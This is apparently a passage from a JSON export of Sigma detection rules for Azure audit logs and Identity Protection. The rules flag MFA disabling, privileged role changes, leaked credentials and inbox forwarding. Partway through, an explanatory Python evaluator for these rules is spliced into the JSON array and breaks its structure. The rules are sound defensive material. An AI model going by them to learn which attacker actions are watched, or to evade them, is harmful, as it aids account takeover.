    "content": "title: Change to Authentication Method\nid: 4d78a000-ab52-4564-88a5-7ab5242b20c7\nstatus: test\ndescription: Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts\nauthor: AlertIQ\ndate: 2021-10-10\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.t1556\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1098\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        LoggedByService: 'Authentication Methods'\n        Category: 'UserManagement'\n        OperationName: 'User registered security info'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_federation_modified.yml",
    "content": "title: Azure Domain Federation Settings Modified\nid: 352a54e1-74ba-4929-9d47-8193d67aba1e\nstatus: test\ndescription: Identifies when a user or application modified the federation settings on the domain.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes\nauthor: Austin Songer\ndate: 2021-09-06\nmodified: 2022-06-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        ActivityDisplayName: Set federation settings on domain\n    condition: selection\nfalsepositives:\n    - Federation Settings being modified or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_group_user_addition_ca_modification.yml",
    "content": "title: User Added To Group With CA Policy Modification Access\nid: 91c95675-1f27-46d0-bead-d1ae96b97cd3\nstatus: test\ndescription: Monitor and alert on group membership additions of groups that have CA policy modification access\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access\nauthor: Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'\ndate: 2022-08-04\ntags:\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1548\n    - attack.t1556\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Add member from group\n    condition: selection\nfalsepositives:\n    - User removed from the group is approved\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_group_user_removal_ca_modification.yml",
    "content": "title: User Removed From Group With CA Policy Modification Access\nid: 665e2d43-70dc-4ccc-9d27-026c9dd7ed9c\nstatus: test\ndescription: Monitor and alert on group membership removal of groups that have CA policy modification access\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access\nauthor: Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'\ndate: 2022-08-04\ntags:\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1548\n    - attack.t1556\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Remove member from group\n    condition: selection\nfalsepositives:\n    - User removed from the group is approved\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_guest_invite_failure.yml",
    "content": "title: Guest User Invited By Non Approved Inviters\nid: 0b4b72e3-4c53-4d5b-b198-2c58cfef39a9\nstatus: test\ndescription: Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#things-to-monitor\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-10\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Invite external user\n        Status: failure\n    condition: selection\nfalsepositives:\n    - A non malicious user is unaware of the proper process\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_guest_to_member.yml",
    "content": "title: User State Changed From Guest To Member\nid: 8dee7a0d-43fd-4b3c-8cd1-605e189d195e\nstatus: test\ndescription: Detects the change of user type from \"Guest\" to \"Member\" for potential elevation of privilege.\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins\nauthor: MikeDuddington, '@dudders1'\ndate: 2022-06-30\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        Category: 'UserManagement'\n        OperationName: 'Update user'\n        properties.message: '\"displayName\":\"UserType\",\"oldValue\":\"[\\\"Guest\\\"]\",\"newValue\":\"[\\\"Member\\\"]\"'\n    condition: selection\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_pim_activation_approve_deny.yml",
    "content": "title: PIM Approvals And Deny Elevation\nid: 039a7469-0296-4450-84c0-f6966b16dc6d\nstatus: test\ndescription: Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-09\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Request Approved/Denied\n    condition: selection\nfalsepositives:\n    - Actual admin using PIM.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_pim_alerts_disabled.yml",
    "content": "title: PIM Alert Setting Changes To Disabled\nid: aeaef14c-e5bf-4690-a9c8-835caad458bd\nstatus: test\ndescription: Detects when PIM alerts are set to disabled.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-09\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Disable PIM Alert\n    condition: selection\nfalsepositives:\n    - Administrator disabling PIM alerts as an active choice.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_pim_change_settings.yml",
    "content": "title: Changes To PIM Settings\nid: db6c06c4-bf3b-421c-aa88-15672b88c743\nstatus: test\ndescription: Detects when changes are made to PIM role settings.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-09\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Update role setting in PIM\n    condition: selection\nfalsepositives:\n    - Legitimate administrative PIM setting configuration changes\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_add.yml",
    "content": "title: User Added To Privilege Role\nid: 49a268a4-72f4-4e38-8a7b-885be690c5b5\nstatus: test\ndescription: Detects when a user is added to a privileged role.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-06\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message:\n            - Add eligible member (permanent)\n            - Add eligible member (eligible)\n    condition: selection\nfalsepositives:\n    - Legitimate administrator actions of adding members to a role\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_bulk_change.yml",
    "content": "title: Bulk Deletion Changes To Privileged Account Permissions\nid: 102e11e3-2db5-4c9e-bc26-357d42585d21\nstatus: test\ndescription: Detects when a user is removed from a privileged role. Bulk changes should be investigated.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-05\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message:\n            - Remove eligible member (permanent)\n            - Remove eligible member (eligible)\n    condition: selection\nfalsepositives:\n    - Legitimate administrator actions of removing members from a role\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_privileged_account_creation.yml",
    "content": "title: Privileged Account Creation\nid: f7b5b004-dece-46e4-a4a5-f6fd0e1c6947\nstatus: test\ndescription: Detects when a new admin is created.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton\ndate: 2022-08-11\nmodified: 2022-08-16\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message|contains|all:\n            - Add user\n            - Add member to role\n        Status: Success\n    condition: selection\nfalsepositives:\n    - A legitimate new admin account being created\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_subscription_permissions_elevation_via_auditlogs.yml",
    "content": "title: Azure Subscription Permission Elevation Via AuditLogs\nid: ca9bf243-465e-494a-9e54-bf9fc239057d\nstatus: test\ndescription: |\n    Detects when a user has been elevated to manage all Azure Subscriptions.\n    This change should be investigated immediately if it isn't planned.\n    This setting could allow an attacker access to Azure subscriptions in your environment.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#assignment-and-elevation\nauthor: Austin Songer @austinsonger\ndate: 2021-11-26\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        Category: 'Administrative'\n        OperationName: 'Assigns the caller to user access admin'\n    condition: selection\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_tap_added.yml",
    "content": "title: Temporary Access Pass Added To An Account\nid: fa84aaf5-8142-43cd-9ec2-78cfebf878ce\nstatus: test\ndescription: Detects when a temporary access pass (TAP) is added to an account. TAPs added to privileged accounts should be investigated.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-10\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Admin registered security info\n        Status: Admin registered temporary access pass method for user\n    condition: selection\nfalsepositives:\n    - Administrator adding a legitimate temporary access pass\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_update_risk_and_mfa_registration_policy.yml",
    "content": "title: User Risk and MFA Registration Policy Updated\nid: d4c7758e-9417-4f2e-9109-6125d66dabef\nstatus: test\ndescription: |\n    Detects changes and updates to the user risk and MFA registration policy.\n    Attackers can modify the policy to bypass MFA, weaken security thresholds, facilitate further attacks, or maintain persistence.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-configure-mfa-policy\n    - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities\nauthor: Harjot Singh (@cyb3rjy0t)\ndate: 2024-08-13\ntags:\n    - attack.persistence\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        LoggedByService: 'AAD Management UX'\n        Category: 'Policy'\n        OperationName: 'Update User Risk and MFA Registration Policy'\n    condition: selection\nfalsepositives:\n    - Known updates by administrators.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_user_account_mfa_disable.yml",
    "content": "title: Multi Factor Authentication Disabled For User Account\nid: b18454c8-0be3-41f7-86bc-9c614611b839\nstatus: test\ndescription: |\n    Detects changes to the \"StrongAuthenticationRequirement\" value, where the state is set to \"0\" or \"Disabled\".\n    Threat actors have been seen disabling multi-factor authentication for users in order to maintain or achieve access to the account. Also seen in SIM swap attacks.\nreferences:\n    - https://www.sans.org/blog/defending-against-scattered-spider-and-the-com-with-cybercrime-intelligence/\nauthor: Harjot Singh (@cyb3rjy0t)\ndate: 2024-08-21\ntags:\n    - attack.credential-access\n    - attack.persistence\nlogsource:\n    product: azure\n    service: auditlogs\n    definition: 'Requirements: The TargetResources array needs to be mapped accurately in order for this rule to work'\ndetection:\n    selection:\n        LoggedByService: 'Core Directory'\n        Category: 'UserManagement'\n        OperationName: 'Update user'\n        TargetResources.ModifiedProperties.DisplayName: 'StrongAuthenticationRequirement'\n        TargetResources.ModifiedProperties.NewValue|contains: \"State\\\":0\"\n    condition: selection\nfalsepositives:\n    - Legitimate authorized activity.\nlevel: medium\n"
  },
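The detection blocks above are declarative, so it is easy to misjudge what a selection actually matches once the record is flattened into a log store. The following is an added example, not code from the Sigma project: a small evaluator for the Sigma subset these Azure AuditLogs rules use (plain-value equality, value lists, the `contains` and `all` modifiers, dotted field paths, `and`-joined selections), run over constructed events for the `Privileged Account Creation` and `Multi Factor Authentication Disabled For User Account` rules. The two rules' `detection` blocks are transcribed as Python dicts rather than parsed from YAML, and every event value is invented.

```python
# Added example (not Sigma project code): a small evaluator for the Sigma
# subset used by the Azure AuditLogs rules above, run over constructed events.
from typing import Any


def field_values(event: dict, path: str) -> list[Any]:
    """Resolve a dotted field path; list nodes are expanded so any element
    may satisfy a match, the way a flattened log-store mapping behaves."""
    nodes: list[Any] = [event]
    for part in path.split("."):
        expanded: list[Any] = []
        for node in nodes:
            if isinstance(node, dict) and part in node:
                value = node[part]
                expanded.extend(value if isinstance(value, list) else [value])
        nodes = expanded
    return [n for n in nodes if not isinstance(n, (dict, list))]


def value_matches(actual: Any, expected: Any, modifiers: list[str]) -> bool:
    """Plain Sigma values compare for equality; `contains` is a substring test."""
    actual_s, expected_s = str(actual), str(expected)
    return expected_s in actual_s if "contains" in modifiers else actual_s == expected_s


def field_matches(event: dict, key: str, spec: Any) -> bool:
    """One `field|modifier...: value(s)` entry; a value list means any,
    unless the `all` modifier is present."""
    field, *modifiers = key.split("|")
    actual = field_values(event, field)
    expected = spec if isinstance(spec, list) else [spec]
    combine = all if "all" in modifiers else any
    return combine(any(value_matches(a, e, modifiers) for a in actual) for e in expected)


def rule_matches(event: dict, detection: dict) -> bool:
    """Assumption: conditions are `sel` or `sel and sel2`, as in the rules
    above; `or`, `not`, wildcards and regex are not implemented."""
    names = [t for t in detection["condition"].split() if t != "and"]
    return all(
        all(field_matches(event, k, v) for k, v in detection[n].items()) for n in names
    )


def fired(event: dict, rules: dict[str, dict]) -> list[str]:
    """Names of the rules whose detection block matches the event."""
    return [name for name, det in rules.items() if rule_matches(event, det)]


# `detection` blocks of two rules above, rendered as dicts instead of YAML.
RULES = {
    "Privileged Account Creation": {
        "selection": {
            "properties.message|contains|all": ["Add user", "Add member to role"],
            "Status": "Success",
        },
        "condition": "selection",
    },
    "Multi Factor Authentication Disabled For User Account": {
        "selection": {
            "LoggedByService": "Core Directory",
            "Category": "UserManagement",
            "OperationName": "Update user",
            "TargetResources.ModifiedProperties.DisplayName": "StrongAuthenticationRequirement",
            "TargetResources.ModifiedProperties.NewValue|contains": 'State":0',
        },
        "condition": "selection",
    },
}

# Constructed events: the shape follows Azure AuditLogs, the values are invented.
ADMIN_CREATED = {
    "Status": "Success",
    "properties": {"message": "Add user; Add member to role (Global Administrator)"},
}
MFA_DISABLED = {
    "LoggedByService": "Core Directory",
    "Category": "UserManagement",
    "OperationName": "Update user",
    "TargetResources": [{"ModifiedProperties": [
        {"DisplayName": "StrongAuthenticationRequirement",
         "NewValue": '[{"RelyingParty":"*","State":0}]'},
    ]}],
}
# MFA stays enforced (State 1) but a different property carries 'State":0':
# per-field matching across array elements cannot tell the two apart.
MFA_CROSS_ELEMENT = {
    **MFA_DISABLED,
    "TargetResources": [{"ModifiedProperties": [
        {"DisplayName": "StrongAuthenticationRequirement",
         "NewValue": '[{"RelyingParty":"*","State":1}]'},
        {"DisplayName": "PasswordPolicies", "NewValue": '[{"State":0}]'},
    ]}],
}

if __name__ == "__main__":
    for label, ev in [("admin", ADMIN_CREATED), ("mfa", MFA_DISABLED),
                      ("cross", MFA_CROSS_ELEMENT)]:
        print(label, fired(ev, RULES))
```

The third event is the point behind the MFA rule's `definition` line: once `TargetResources.ModifiedProperties` is flattened, `DisplayName` and `NewValue` are matched independently across all array elements, so an update that leaves `StrongAuthenticationRequirement` at `State":1` still fires if any other modified property happens to contain `State":0`. A backend that keeps each array element together (nested queries, or a mapping that preserves the per-element pairing) avoids that; a flattened index does not, and the rule's `medium` level should be read with that in mind.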
  {
    "path": "rules/cloud/azure/audit_logs/azure_user_password_change.yml",
    "content": "title: Password Reset By User Account\nid: 340ee172-4b67-4fb4-832f-f961bdc1f3aa\nstatus: test\ndescription: Detects when a user has reset their password in Azure AD.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts\nauthor: YochanaHenderson, '@Yochana-H'\ndate: 2022-08-03\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.credential-access\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        Category: 'UserManagement'\n        Status: 'Success'\n        Initiatedby: 'UPN'\n    filter:\n        Target|contains: 'UPN'\n        ActivityType|contains: 'Password reset'\n    condition: selection and filter\nfalsepositives:\n    - If this was approved by System Administrator or confirmed user action.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_token.yml",
    "content": "title: Anomalous Token\nid: 6555754e-5e7f-4a67-ad1c-4041c413a007\nstatus: test\ndescription: Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-token\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow'\ndate: 2023-08-07\ntags:\n    - attack.t1528\n    - attack.credential-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'anomalousToken'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_user.yml",
    "content": "title: Anomalous User Activity\nid: 258b6593-215d-4a26-a141-c8e31c1299a6\nstatus: test\ndescription: Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-user-activity\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.privilege-escalation\n    - attack.t1098\n    - attack.persistence\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'anomalousUserActivity'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_activity.yml",
    "content": "title: Activity From Anonymous IP Address\nid: be4d9c86-d702-4030-b52e-c7859110e5e8\nstatus: test\ndescription: Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1078\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'riskyIPAddress'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_address.yml",
    "content": "title: Anonymous IP Address\nid: 53acd925-2003-440d-a1f3-71a5253fe237\nstatus: test\ndescription: Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.\nreferences:\n    - https://learn.microsoft.com/en-us/graph/api/resources/riskdetection?view=graph-rest-1.0\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anonymous-ip-address\nauthor: Gloria Lee, '@gleeiamglo'\ndate: 2023-08-22\ntags:\n    - attack.t1528\n    - attack.credential-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'anonymizedIPAddress'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_atypical_travel.yml",
    "content": "title: Atypical Travel\nid: 1a41023f-1e70-4026-921a-4d9341a9038e\nstatus: test\ndescription: Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#atypical-travel\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1078\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'unlikelyTravel'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_impossible_travel.yml",
    "content": "title: Impossible Travel\nid: b2572bf9-e20a-4594-b528-40bde666525a\nstatus: test\ndescription: Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#impossible-travel\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1078\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'impossibleTravel'\n    condition: selection\nfalsepositives:\n    - Connecting to a VPN, performing activity and then dropping and performing additional activity.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_inbox_forwarding_rule.yml",
    "content": "title: Suspicious Inbox Forwarding Identity Protection\nid: 27e4f1d6-ae72-4ea0-8a67-77a73a289c3d\nstatus: test\ndescription: Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-forwarding\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1114.003\n    - attack.collection\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'suspiciousInboxForwarding'\n    condition: selection\nfalsepositives:\n    - A legitimate forwarding rule.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_inbox_manipulation.yml",
    "content": "title: Suspicious Inbox Manipulation Rules\nid: ceb55fd0-726e-4656-bf4e-b585b7f7d572\nstatus: test\ndescription: Detects when suspicious rules that delete or move messages or folders are set on a user's inbox.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1140\n    - attack.defense-evasion\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'mcasSuspiciousInboxManipulationRules'\n    condition: selection\nfalsepositives:\n    - Actual mailbox rules that are moving items based on their workflow.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_leaked_credentials.yml",
    "content": "title: Azure AD Account Credential Leaked\nid: 19128e5e-4743-48dc-bd97-52e5775af817\nstatus: test\ndescription: Indicates that the user's valid credentials have been leaked.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#leaked-credentials\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1589\n    - attack.reconnaissance\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'leakedCredentials'\n    condition: selection\nfalsepositives:\n    - A rare hash collision.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address.yml",
    "content": "title: Malicious IP Address Sign-In Failure Rate\nid: a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd\nstatus: test\ndescription: Indicates sign-in from a malicious IP address based on high failure rates.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-07\ntags:\n    - attack.t1090\n    - attack.command-and-control\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'maliciousIPAddress'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address_suspicious.yml",
    "content": "title: Malicious IP Address Sign-In Suspicious\nid: 36440e1c-5c22-467a-889b-593e66498472\nstatus: test\ndescription: Indicates a sign-in from an IP address that was known to be malicious at the time of sign-in.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-07\ntags:\n    - attack.t1090\n    - attack.command-and-control\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'suspiciousIPAddress'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_malware_linked_ip.yml",
    "content": "title: Sign-In From Malware Infected IP\nid: 821b4dc3-1295-41e7-b157-39ab212dd6bd\nstatus: test\ndescription: Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1090\n    - attack.command-and-control\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'malwareInfectedIPAddress'\n    condition: selection\nfalsepositives:\n    - Using an IP address that is shared by many users\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_new_coutry_region.yml",
